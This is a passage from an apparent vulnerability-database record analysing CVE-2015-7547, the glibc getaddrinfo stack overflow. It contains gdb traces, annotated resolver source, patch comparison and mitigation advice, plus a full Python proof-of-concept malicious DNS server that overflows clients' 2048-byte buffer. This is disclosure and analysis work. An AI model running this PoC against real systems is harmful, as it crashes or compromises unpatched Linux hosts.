directory.\r\n```\r\n\r\n\u8fde\u63a5\u540e\uff0c\u6211\u4eec\u7ee7\u7eed\u5355\u6b65\u8ddf\u8fdb\uff0cpoc\u7aef\u6536\u5230\u4e86tcp\u7684\u8bf7\u6c42\uff0c\u540c\u65f6\uff0cglibc\u63a5\u6536\u5230\u4e86\u7578\u5f62\u5b57\u7b26\u4e32\uff0c\u901a\u8fc7read\u51fd\u6570\u8bfb\u53d6\uff0c\u6211\u4eec\u53ef\u4ee5\u6765\u89c2\u5bdf\u4e00\u4e0b\u8bfb\u53d6\u524d\u540e\u7684\u60c5\u51b5\uff0c\u5728\u6b64\u4e4b\u524d\uff0c\u6211\u4eec\u901a\u8fc7bt\u89c2\u5bdf\u4e00\u4e0b\u67d0\u4e2a\u4e4b\u524d\u63d0\u5230\u7684\u91cd\u70b9\u53d8\u91cf\uff0c\u5c31\u662f\u4fdd\u5b58\u4e862048\u7f13\u51b2\u533a\u7684\u91cd\u70b9\u53d8\u91cf\u3002\r\n\r\n```\r\ngdb-peda$ bt\r\n#0 send_vc (statp=0xb7fd6340 <_res@GLIBC_2.0>, buf=0xbfffd740 \"\\274\\206\\001\", \r\n buflen=0x24, buf2=0xbfffd764 \"\\264\\316\\001\", buflen2=0x24, \r\n ansp=0xbfffd65c, anssizp=0xbfffd728, terrno=0xbfffd668, ns=0x0, \r\n anscp=0xbfffeb6c, ansp2=0xbfffeb70, anssizp2=0xbfffeb74, \r\n resplen2=0xbfffeb78, ansp2_malloced=0xbfffeb7c) at res_send.c:669\r\n#1 0xb7df3c4e in __libc_res_nsend (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"\\274\\206\\001\", buflen=0x24, \r\n buf2=0xbfffd764 \"\\264\\316\\001\", buflen2=0x24, ans=0xbfffe340 \"\", \r\n anssiz=0x10000, ansp=0xbfffeb6c, ansp2=0xbfffeb70, nansp2=0xbfffeb74, \r\n resplen2=0xbfffeb78, ansp2_malloced=0xbfffeb7c) at res_send.c:554\r\n#2 0xb7df191b in __GI___libc_res_nquery (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe340 \"\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at res_query.c:227\r\n#3 0xb7df1fa1 in __libc_res_nquerydomain (\r\n statp=statp@entry=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=name@entry=0x8048653 \"foo.bar.google.com\", domain=0x0, class=0x1, \r\n type=0xf371, answer=0xbfffe340 \"\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at res_query.c:594\r\n#4 0xb7df24cb in __GI___libc_res_nsearch (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe340 \"\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at res_query.c:381\r\n```\r\n\r\n\u8fd9\u91cc\u6211\u4eec\u8981\u597d\u597d\u5206\u6790\u4e00\u4e0b\uff0c\u9996\u5148\u662f#4\u5904\u7684answer\uff0c\u5730\u5740\u662f0xbfffe340\uff0c\u4e4b\u524d\u6211\u4eec\u63d0\u5230\u8fc7\uff0c\u8fd9\u91cc\u65f6\u5f00\u8f9f\u76842048\u957f\u5ea6\u5730\u5740\u7684\u7f13\u51b2\u533a\uff0c\u540e\u9762\u7684anslen=0x800\u4e5f\u662f\u957f\u5ea6\uff0c2048\uff0c\u63a5\u4e0b\u6765\u5728#3\u4e2d\uff0canswer\u5730\u5740\u6ca1\u6709\u53d8\u5316\u7ee7\u7eed\u4f20\u9012\uff0c\u63a5\u4e0b\u6765\u5728res_nquery\u4e2d\uff0c\u4f9d\u7136\u6ca1\u6709\u53d8\u5316\uff0c\u6700\u540e\u5230\u8fbe\u5173\u952e\u51fd\u6570send_vc\u7684\u65f6\u5019\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230ansp=0xbfffd65c\uff0c\u8fd9\u4e2a\u5730\u5740\u975e\u5e38\u6709\u610f\u601d\uff0c\u9996\u5148\u5728\u51fd\u6570\u5165\u53e3\u5904\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u5730\u5740\u7684\u4e2d\u5b58\u653e\u7684\u503c\u3002\r\n\r\n```\r\ngdb-peda$ x/10x 0xbfffd65c\r\n0xbfffd65c:\t0xbfffe340\t0xbfffd764\t0xbfffd770\t0x0000006e\r\n0xbfffd66c:\t0x000009e8\t0x56cd507c\t0x1d20b5f8\t0x00000003\r\n0xbfffd67c:\t0x00010001\t0xbfffd740\r\n```\r\n\r\n\u8fd8\u662f0xbfffe340\uff0c\u90a3\u4e48\u8fd9\u4e2a\u5730\u5740\u5f88\u6709\u53ef\u80fd\u662f\u5730\u5740\u6307\u9488\u7684\u6307\u9488\uff0c\u4e5f\u5c31\u662f\u7c7b\u4f3c\u4e8e**ansp\u8fd9\u6837\u7684\u5f62\u5f0f\uff01\u63a5\u4e0b\u6765\u8fd9\u4e2a\u503c\u662f\u5982\u4f55\u4f20\u9012\u7684\u5462\uff0c\u6211\u4eec\u53ef\u4ee5\u5206\u6790\u4e00\u4e0b\u3002\u8bf7\u6ce8\u610f\u6211\u5355\u884c\u7684\u6ce8\u91ca\u3002\r\n\r\n\r\n```\r\nstatic int\r\nsend_vc(res_state statp,\r\n\tconst u_char *buf, int buflen, const u_char *buf2, int buflen2,\r\n\tu_char **ansp, int *anssizp,//ansp\u662f2048\u7f13\u51b2\u533a\u5bf9\u5e94\u5730\u5740\r\n\tint *terrno, int ns, u_char **anscp, u_char **ansp2, int *anssizp2,\r\n\tint *resplen2, int *ansp2_malloced)\r\n{\r\n\tconst HEADER *hp = (HEADER *) buf;\r\n\tconst HEADER *hp2 = (HEADER *) buf2;\r\n\tu_char *ans = *ansp;//\u5bf9\u5e94\u5730\u5740\u7684\u4f20\u9012\r\n\tint orig_anssizp = *anssizp;\r\n\t// XXX REMOVE\r\n\t// int anssiz = *anssizp;\r\n\tHEADER *anhp = (HEADER *) ans;\r\n\u2026\u2026\r\n\u2026\u2026\r\n\tif (statp->_vcsock < 0 || (statp->_flags & RES_F_VC) == 0) {\r\n\t\tif (statp->_vcsock >= 0)\r\n\t\t __res_iclose(statp, false);\r\n//\u8fd9\u91cc\u5efa\u7acbsocket\u8fde\u63a5\r\n\t\tstatp->_vcsock = socket(nsap->sin6_family, SOCK_STREAM, 0);\r\n\t\tif (statp->_vcsock < 0) {\r\n\t\t\t*terrno = errno;\r\n\t\t\tPerror(statp, stderr, \"socket(vc)\", errno);\r\n\t\t\treturn (-1);\r\n\t\t}\r\n\t\t__set_errno (0);\r\n//connect\u64cd\u4f5c\uff0c\u5ba2\u6237\u7aef\u4f1a\u63d0\u793aconnect 127.0.0.1\r\n\t\tif (connect(statp->_vcsock, (struct sockaddr *)nsap,\r\n\t\t\t nsap->sin6_family == AF_INET\r\n\t\t\t ? sizeof (struct sockaddr_in)\r\n\t\t\t : sizeof (struct sockaddr_in6)) < 0) {\r\n\t\t\t*terrno = errno;\r\n\t\t\tAerror(statp, stderr, \"connect/vc\", errno,\r\n\t\t\t (struct sockaddr *) nsap);\r\n\t\t\t__res_iclose(statp, false);\r\n\t\t\treturn (0);\r\n\t\t}\r\n\t\tstatp->_flags |= RES_F_VC;\r\n\t}\r\n\r\n\t/*\u53d1\u9001\u90e8\u5206\uff0c\u65e0\u5173\u7d27\u8981\r\n\t * Send length & message\r\n\t */\r\n\u2026\u2026\r\n\t/*\u63a5\u6536\u90e8\u5206\r\n\t * Receive length & response\r\n\t */\r\n\tint recvresp1 = 0;\r\n\tint recvresp2 = buf2 == NULL;\r\n\tuint16_t rlen16;\r\n read_len:\r\n\tcp = (u_char *)&rlen16;\r\n\tlen = sizeof(rlen16);\r\n\twhile ((n = TEMP_FAILURE_RETRY (read(statp->_vcsock, cp,\r\n\t\t\t\t\t (int)len))) > 0) {\r\n\t\tcp += n;\r\n\t\tif ((len -= n) <= 0)\r\n\t\t\tbreak;\r\n\t}\r\n\tif (n <= 0) {\r\n\t\t*terrno = errno;\r\n\t\tPerror(statp, stderr, \"read failed\", errno);\r\n\t\t__res_iclose(statp, false);\r\n\t\t/*\r\n\t\t * A long running process might get its TCP\r\n\t\t * connection reset if the remote server was\r\n\t\t * restarted. Requery the server instead of\r\n\t\t * trying a new one. When there is only one\r\n\t\t * server, this means that a query might work\r\n\t\t * instead of failing. We only allow one reset\r\n\t\t * per query to prevent looping.\r\n\t\t */\r\n\t\tif (*terrno == ECONNRESET && !connreset) {\r\n\t\t\tconnreset = 1;\r\n\t\t\tgoto same_ns;\r\n\t\t}\r\n\t\treturn (0);\r\n\t}\r\n\tint rlen = ntohs (rlen16);\r\n\r\n\tint *thisanssizp;\r\n\tu_char **thisansp;\r\n\tint *thisresplenp;\r\n\tif ((recvresp1 | recvresp2) == 0 || buf2 == NULL) {\r\n\u2026\u2026//\u7b2c\u4e00\u6b21\u6536\u5230\uff0c\u65e0\u5173\u7d27\u8981\uff0c\u7b2c\u4e8c\u6b21\u6536\u5230\u5c06\u8fdb\u5165\u4e0b\u9762\u7684else\u90e8\u5206\r\n\t} else {\r\n\t\tif (*anssizp != MAXPACKET) {\r\n\u2026\u2026\r\n\t\t} else {\r\n\t\t\t/* The first reply did not fit into the\r\n\t\t\t user-provided buffer. Maybe the second\r\n\t\t\t answer will. */\r\n\t\t\t*anssizp2 = orig_anssizp;\r\n\t\t\t*ansp2 = *ansp;\r\n\t\t}\r\n\r\n\t\tthisanssizp = anssizp2;\r\n\t\tthisansp = ansp2;\r\n\t\t//\u6b64\u65f6ansp2\u4f1a\u8d4b\u503c\u7ed9thisansp\uff0c\u800c\u6b64\u65f6thisansp\u7684\u503c\u662fansp\r\n\t\tthisresplenp = resplen2;\r\n\t}\r\n\u2026\u2026\r\n//\u6b64\u65f6cp\u7684\u5730\u5740\u662fbfffe340\uff0c\u4e5f\u5c31\u662f2048\u5b57\u8282\u7f13\u51b2\u533a\r\n\tcp = *thisansp;\r\n\t\u63a5\u7740read\u53c2\u6570\u4f1a\u8bfb\u53d6\u8fd9\u4e2a\u63a5\u6536\u5230\u7684\u53c2\u6570\uff0c\u7b2c\u4e8c\u6b21\u63a5\u6536\u5230\u65f6\uff0c\u662f\u957f\u5ea6\u4e3a\u8d85\u957f\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u6b64\u65f6\uff0c\u6ca1\u6709\u5bf9\u8fd9\u4e2a\u5b57\u7b26\u4e32\u957f\u5ea6\u8fdb\u884c\u4efb\u4f55\u5224\u65ad\uff01\r\n\twhile (len != 0 && (n = read(statp->_vcsock, (char *)cp, (int)len)) > 0){\r\n\t\tcp += n;\r\n\t\tlen -= n;\r\n\t}\r\n```\r\n\r\n\u770b\u5230\u8fd9\u91cc\uff0c\u6211\u4eec\u57fa\u672c\u53ef\u4ee5\u5206\u6790\u51fa\u6765\u4e3a\u4ec0\u4e48PoC\u8981\u53d1\u9001\u4e24\u6b21\uff0c\u800c\u5728\u7b2c\u4e8c\u6b21\u4e2d\uff0c\u52a0\u4e0a\u4e862300\u4e2a'B'\uff0c\u4e5f\u5c31\u662f\u8bf4\u5728\u7b2c\u4e8c\u6b21\u63a5\u6536\u65f6\uff0c2048\u7f13\u51b2\u533a\u5bf9\u5e94\u7684\u53d8\u91cf\u4f1a\u8d4b\u503c\u7ed9\u5373\u5c06\u63a5\u6536\u5b57\u7b26\u4e32\u7684\u7f13\u51b2\u533a\uff0c\u800c\u6b64\u65f6\uff0c\u6ca1\u6709\u5bf9\u8fd9\u4e2a\u7f13\u51b2\u533a\u8981\u63a5\u6536\u5185\u5bb9\u7684\u957f\u5ea6\u8fdb\u884c\u5904\u7406\uff0c\u4ece\u800c\u5bfc\u81f4\u4e86\u8d85\u957f\u4e32\u8986\u76d6\uff0c\u51fd\u6570\u8fd4\u56de\u540e\uff0c\u67d0\u4e2a\u5730\u5740\u88ab\u8986\u76d6\u5bfc\u81f4dns\u8bf7\u6c42\u5d29\u6e83\u3002\r\n\r\n\u63a5\u4e0b\u6765\u6211\u4eec\u53ef\u4ee5\u770b\u4e00\u4e0bread\u524d\u540e\uff0c\u7f13\u51b2\u533a\u7684\u53d8\u5316\u3002\r\n\r\n```\r\ngdb-peda$ n\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x8fe \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0xbfffd65c --> 0xbfffe340 --> 0x0 \r\nEDX: 0x10000 \r\nESI: 0xbfffe340 --> 0x0 \r\nEDI: 0xbfffeb70 --> 0xbfffe340 --> 0x0 \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\nEIP: 0xb7df2eba (<send_vc+1098>:\tmov edi,DWORD PTR [edi])\r\nEFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df2eab <send_vc+1083>:\tmov WORD PTR [esp+0x5e],ax\r\n 0xb7df2eb0 <send_vc+1088>:\tcmp ax,0xb\r\n 0xb7df2eb4 <send_vc+1092>:\tjbe 0xb7df2fbd <send_vc+1357>\r\n=> 0xb7df2eba <send_vc+1098>:\tmov edi,DWORD PTR [edi]\r\n 0xb7df2ebc <send_vc+1100>:\tjmp 0xb7df2ed6 <send_vc+1126>\r\n 0xb7df2ebe <send_vc+1102>:\txchg ax,ax\r\n 0xb7df2ec0 <send_vc+1104>:\tmovzx edx,WORD PTR [esp+0x5e]\r\n 0xb7df2ec5 <send_vc+1109>:\tadd edi,eax\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\n0004| 0xbfffd2f4 --> 0xbfffeb74 --> 0x10000 \r\n0008| 0xbfffd2f8 --> 0xbfffeb6c --> 0x804c748 --> 0x80818bf5 \r\n0012| 0xbfffd2fc --> 0xbfffd728 --> 0x10000 \r\n0016| 0xbfffd300 --> 0xbfffeb70 --> 0xbfffe340 --> 0x0 \r\n0020| 0xbfffd304 --> 0x0 \r\n0024| 0xbfffd308 --> 0xbfffeb74 --> 0x10000 \r\n0028| 0xbfffd30c --> 0x1 \r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n883\tin res_send.c\r\ngdb-peda$ n\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x8fe \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0xbfffe340 --> 0x4242bb5e \r\nEDX: 0x8fe \r\nESI: 0xbfffe340 --> 0x4242bb5e \r\nEDI: 0xbfffe340 --> 0x4242bb5e \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\nEIP: 0xb7df2ec0 (<send_vc+1104>:\tmovzx edx,WORD PTR [esp+0x5e])\r\nEFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df2eba <send_vc+1098>:\tmov edi,DWORD PTR [edi]\r\n 0xb7df2ebc <send_vc+1100>:\tjmp 0xb7df2ed6 <send_vc+1126>\r\n 0xb7df2ebe <send_vc+1102>:\txchg ax,ax\r\n=> 0xb7df2ec0 <send_vc+1104>:\tmovzx edx,WORD PTR [esp+0x5e]\r\n 0xb7df2ec5 <send_vc+1109>:\tadd edi,eax\r\n 0xb7df2ec7 <send_vc+1111>:\tsub edx,eax\r\n 0xb7df2ec9 <send_vc+1113>:\tmovzx eax,dx\r\n 0xb7df2ecc <send_vc+1116>:\ttest ax,ax\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\n0004| 0xbfffd2f4 --> 0xbfffeb74 ('B' <repeats 200 times>...)\r\n0008| 0xbfffd2f8 --> 0xbfffeb6c ('B' <repeats 200 times>...)\r\n0012| 0xbfffd2fc --> 0xbfffd728 --> 0x10000 \r\n0016| 0xbfffd300 --> 0xbfffeb70 ('B' <repeats 200 times>...)\r\n0020| 0xbfffd304 --> 0x0 \r\n0024| 0xbfffd308 --> 0xbfffeb74 ('B' <repeats 200 times>...)\r\n0028| 0xbfffd30c --> 0x1 \r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n886\tin res_send.c\r\n```\r\n\r\n\u6700\u540e\u6211\u4eec\u53ef\u4ee5\u6765\u770b\u4e00\u4e0b\u8865\u4e01\u540e\u7684\u5bf9\u6bd4\r\n\r\n```\r\n\t*thisresplenp = rlen;\r\n\t/* Is the answer buffer too small? */\r\n\tif (*thisanssizp < rlen) {\r\n\t\t/* If the current buffer is not the the static\r\n\t\t user-supplied buffer then we can reallocate\r\n\t\t it. */\r\n\t\tif (thisansp != NULL && thisansp != ansp) {\r\n\t\t\t/* Always allocate MAXPACKET, callers expect\r\n\t\t\t this specific size. */\r\n\t\t\tu_char *newp = malloc (MAXPACKET);\r\n\t\t\tif (newp == NULL) {\r\n\t\t\t\t*terrno = ENOMEM;\r\n\t\t\t\t__res_iclose(statp, false);\r\n\t\t\t\treturn (0);\r\n\t\t\t}\r\n\t\t\t*thisanssizp = MAXPACKET;\r\n\t\t\t*thisansp = newp;\r\n\t\t\tif (thisansp == ansp2)\r\n\t\t\t *ansp2_malloced = 1;\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\uff0c\u5728\u5b98\u65b9\u4fee\u590d\u76842.23\u7248\u672c\u8bf4\u660e\u4e2d\uff0c\u8fd9\u91cc\u5c06\u4e0d\u518d\u91c7\u7528\u9759\u6001\u7f13\u51b2\u533a2048\uff0c\u800c\u662f\u4f1a\u6839\u636e\u7528\u6237\u7533\u8bf7\u7f13\u51b2\u533a\u7684\u5927\u5c0f\u6765\u91cd\u65b0\u5206\u914d\u7f13\u51b2\u533a\u3002\r\n### 5. \u6f0f\u6d1e\u68c0\u6d4b\r\n\r\n\u7531\u4e8eglibc 2.9 \u662f\u57282008\u5e74\u53d1\u884c\u7684\uff0c\u6240\u4ee5\u5927\u91cfLinux \u7cfb\u7edf\u90fd\u4f1a\u53d7\u5230\u8be5\u6f0f\u6d1e\u5f71\u54cd\u3002\u82e5\u4e00\u65e6\u7ed5\u8fc7\u5185\u5b58\u9632\u62a4\u6280\u672f\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u6210\u4e3a\u4e00\u5927\u6740\u5668\u3002\u88ab\u52ab\u6301\u7684DNS server\u8fdb\u884c\u4e2d\u95f4\u4eba\u653b\u51fb\uff0c\u53ef\u76f4\u63a5\u6279\u91cf\u83b7\u53d6\u5927\u91cf\u4e3b\u673a\u6743\u9650\u3002\r\n\r\n\u5229\u7528ldd \u547d\u4ee4\u67e5\u770bC \u5e93\u51fd\u6570\u7248\u672c\u5982\u4e0b\uff1a\r\n\r\n![](https://images.seebug.org/1455772072008)\r\n\r\n\r\n> \u6709\u8da3\u7684\u662f\uff0c\u65e9\u5728\u53bb\u5e74\u76847\u6708\u4efd\uff0c\u5c31\u6709\u7814\u7a76\u4eba\u5458\u516c\u5e03\u4e86\u6709\u5173\u8fd9\u4e00\u6f0f\u6d1e\u7684\u4fe1\u606f\uff0c\u4f46\u5f53\u65f6 \u6b64\u6f0f\u6d1e\u5e76\u6ca1\u6709\u5f97\u5230\u91cd\u89c6\u3002\r\n\r\n\u6839\u636e\u76ee\u524d\u7684\u8c03\u67e5\u60c5\u51b5\u6211\u4eec\u8ba4\u4e3a\u6b64\u6f0f\u6d1e\u7684\u7ea7\u522b\u8be5\u89c6\u4e3a\u9ad8\u5371\u6f0f\u6d1e\uff0cGlibc\u5e94\u7528\u4e8e\u4f17\u591aLinux\u53d1\u884c\u7248\u672c\u4e2d\uff0c\u6240\u4ee5\u6b64\u7c7b\u6f0f\u6d1e\u5f71\u54cd\u8303\u56f4\u5341\u5206\u5e7f\u6cdb\u3002\u8be5\u6f0f\u6d1e\u5f71\u54cdGlibc 2.9\u4ee5\u540e\u7684\u6240\u6709\u7248\u672c\u3002\r\n\r\n### 6. \u6f0f\u6d1e\u4fee\u590d\r\n\u5efa\u8bae\u5e7f\u5927\u7528\u6237\u5c3d\u5feb\u7ed9\u64cd\u4f5c\u7cfb\u7edf\u6253\u8865\u4e01\uff0c\u8be5\u6f0f\u6d1e\u5b58\u5728\u4e8eresolv/res_send.c\u6587\u4ef6\u4e2d\uff0c\u5f53getaddrinfo()\u51fd\u6570\u88ab\u8c03\u7528\u65f6\u4f1a\u89e6\u53d1\u8be5\u6f0f\u6d1e\u3002\u6280\u672f\u4eba\u5458\u53ef\u4ee5\u9650\u5236TCP DNS\u54cd\u5e94\u5305\u5b57\u8282\u7684\u5927\u5c0f\uff0c\u5e76\u4e22\u5f03\u8d85\u8fc7512\u5b57\u8282\u7684UDP DNS\u6570\u636e\u5305\u6765\u7f13\u89e3\u8be5\u95ee\u9898\u3002\r\n\r\n\u6709\u8da3\u7684\u662f\uff0c\u65e9\u5728\u53bb\u5e74\u76847\u6708\u4efd\uff0c\u5c31\u6709\u7814\u7a76\u4eba\u5458\u516c\u5e03\u4e86\u6709\u5173\u8fd9\u4e00\u6f0f\u6d1e\u7684\u4fe1\u606f\uff0c\u4f46\u5f53\u65f6 \u6b64\u6f0f\u6d1e\u5e76\u6ca1\u6709\u5f97\u5230\u91cd\u89c6\u3002\u6839\u636e\u76ee\u524d\u7684\u8c03\u67e5\u60c5\u51b5\u6211\u4eec\u8ba4\u4e3a\u6b64\u6f0f\u6d1e\u7684\u7ea7\u522b\u8be5\u89c6\u4e3a\u9ad8\u5371\u6f0f\u6d1e\uff0cglibc\u5e94\u7528\u4e8e\u4f17\u591aLinux\u53d1\u884c\u7248\u672c\u4e2d\uff0c\u6240\u4ee5\u6b64\u7c7b\u6f0f\u6d1e\u5f71\u54cd\u8303\u56f4\u5341\u5206\u5e7f\u6cdb\u3002\u8be5\u6f0f\u6d1e\u5f71\u54cdglibc 2.9\u52302.22\u7684\u6240\u6709\u7248\u672c\u3002\r\n\r\n### 7. \u76f8\u5173\u94fe\u63a5\r\n\r\n1. [CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow](https://googleonlinesecurity.blogspot.jp/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html) \r\n\r\n2. [CVE-2015-7547 \u8865\u4e01](https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html)\r\n\r\n3. [\u7d27\u6025\uff01Linux \u5e95\u5c42\u51fd\u6570\u5e93\u201cglibc\u201d\u518d\u73b0\u91cd\u5927\u5b89\u5168\u6f0f\u6d1e\uff01\u591a\u4e2a Linux \u53d1\u884c\u7248\u53d7\u5f71\u54cd](https://mp.weixin.qq.com/s?__biz=MzIwMTQ2NzY4NA==&mid=403076844&idx=1&sn=657ee0d88806c2f1b1c9d8d687aae77a&scene=0&key=710a5d99946419d9b1d0d10b2383538792cf67e29692e00185ec90053e80301f92a83b3ad88bfff9b2ce8b9254db3498&ascene=0&uin=NjY5NjY5MDgw&version=11020201&pass_ticket=SxQNHpTQu%2BemqqSwok9Ncxcx7i7ras3ry108ltQKsj6oDLTthSm%2B6IOpHAad0BG%2B)\r\n\r\n4. [Linux Glibc \u51fd\u6570\u5e93\u6f0f\u6d1e\u5206\u6790(CVE-2015-7547)](http://blog.knownsec.com/2016/02/linux-glibc-cve-2015-7547-analysis/)", "published": "2016-02-17T00:00:00", "type": "seebug", "title": "glibc getaddrinfo \u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2015-7547)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90749", "id": "SSV:90749", "sourceData": "\n #!/usr/bin/python\r\n#\r\n# Copyright 2016 Google Inc\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\n# Authors: \r\n# Fermin J. Serna <fjserna@google.com>\r\n# Gynvael Coldwind <gynvael@google.com>\r\n# Thomas Garnier <thgarnie@google.com>\r\n\r\nimport socket\r\nimport time\r\nimport struct\r\nimport threading\r\n\r\nIP = '127.0.0.1' # Insert your ip for bind() here...\r\nANSWERS1 = 184\r\n\r\nterminate = False\r\nlast_reply = None\r\nreply_now = threading.Event()\r\n\r\n\r\ndef dw(x):\r\n return struct.pack('>H', x)\r\n\r\ndef dd(x):\r\n return struct.pack('>I', x)\r\n\r\ndef dl(x):\r\n return struct.pack('<Q', x)\r\n\r\ndef db(x):\r\n return chr(x)\r\n\r\ndef udp_thread():\r\n global terminate\r\n\r\n # Handle UDP requests\r\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_udp.bind((IP, 53))\r\n\r\n reply_counter = 0\r\n counter = -1\r\n\r\n answers = []\r\n\r\n while not terminate:\r\n data, addr = sock_udp.recvfrom(1024)\r\n print '[UDP] Total Data len recv ' + str(len(data))\r\n id_udp = struct.unpack('>H', data[0:2])[0]\r\n query_udp = data[12:]\r\n\r\n # Send truncated flag... so it retries over TCP\r\n data = dw(id_udp) # id\r\n data += dw(0x8380) # flags with truncated set\r\n data += dw(1) # questions\r\n data += dw(0) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query_udp # question\r\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \r\n\r\n answers.append((data, addr))\r\n\r\n if len(answers) != 2:\r\n continue\r\n\r\n counter += 1\r\n\r\n if counter % 4 == 2:\r\n answers = answers[::-1]\r\n\r\n time.sleep(0.01)\r\n sock_udp.sendto(*answers.pop(0))\r\n reply_now.wait()\r\n sock_udp.sendto(*answers.pop(0))\r\n\r\n sock_udp.close()\r\n\r\n\r\ndef tcp_thread():\r\n global terminate\r\n counter = -1\r\n\r\n #Open TCP socket\r\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_tcp.bind((IP, 53))\r\n sock_tcp.listen(10)\r\n\r\n while not terminate:\r\n conn, addr = sock_tcp.accept()\r\n counter += 1\r\n print 'Connected with ' + addr[0] + ':' + str(addr[1])\r\n\r\n # Read entire packet\r\n data = conn.recv(1024)\r\n print '[TCP] Total Data len recv ' + str(len(data))\r\n\r\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\r\n print '[TCP] Request1 len recv ' + str(reqlen1)\r\n data1 = data[2:2+reqlen1]\r\n id1 = struct.unpack('>H', data1[0:2])[0]\r\n query1 = data[12:]\r\n\r\n # Do we have an extra request?\r\n data2 = None\r\n if len(data) > 2+reqlen1:\r\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\r\n print '[TCP] Request2 len recv ' + str(reqlen2)\r\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\r\n id2 = struct.unpack('>H', data2[0:2])[0]\r\n query2 = data2[12:]\r\n\r\n # Reply them on different packets\r\n data = ''\r\n data += dw(id1) # id\r\n data += dw(0x8180) # flags\r\n data += dw(1) # questions\r\n data += dw(ANSWERS1) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query1 # question\r\n\r\n for i in range(ANSWERS1):\r\n answer = dw(0xc00c) # name compressed\r\n answer += dw(1) # type A\r\n answer += dw(1) # class\r\n answer += dd(13) # ttl\r\n answer += dw(4) # data length\r\n answer += 'D' * 4 # data\r\n\r\n data += answer\r\n\r\n data1_reply = dw(len(data)) + data\r\n\r\n if data2:\r\n data = ''\r\n data += dw(id2)\r\n data += 'B' * (2300)\r\n data2_reply = dw(len(data)) + data\r\n else:\r\n data2_reply = None\r\n\r\n reply_now.set()\r\n time.sleep(0.01)\r\n conn.sendall(data1_reply)\r\n time.sleep(0.01)\r\n if data2:\r\n conn.sendall(data2_reply)\r\n\r\n reply_now.clear()\r\n\r\n sock_tcp.shutdown(socket.SHUT_RDWR)\r\n sock_tcp.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n t = threading.Thread(target=udp_thread)\r\n t.daemon = True\r\n t.start()\r\n tcp_thread()\r\n terminate = True\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-90749"}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:20", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-106.0.1.4]\n- Remove strstr and strcasestr 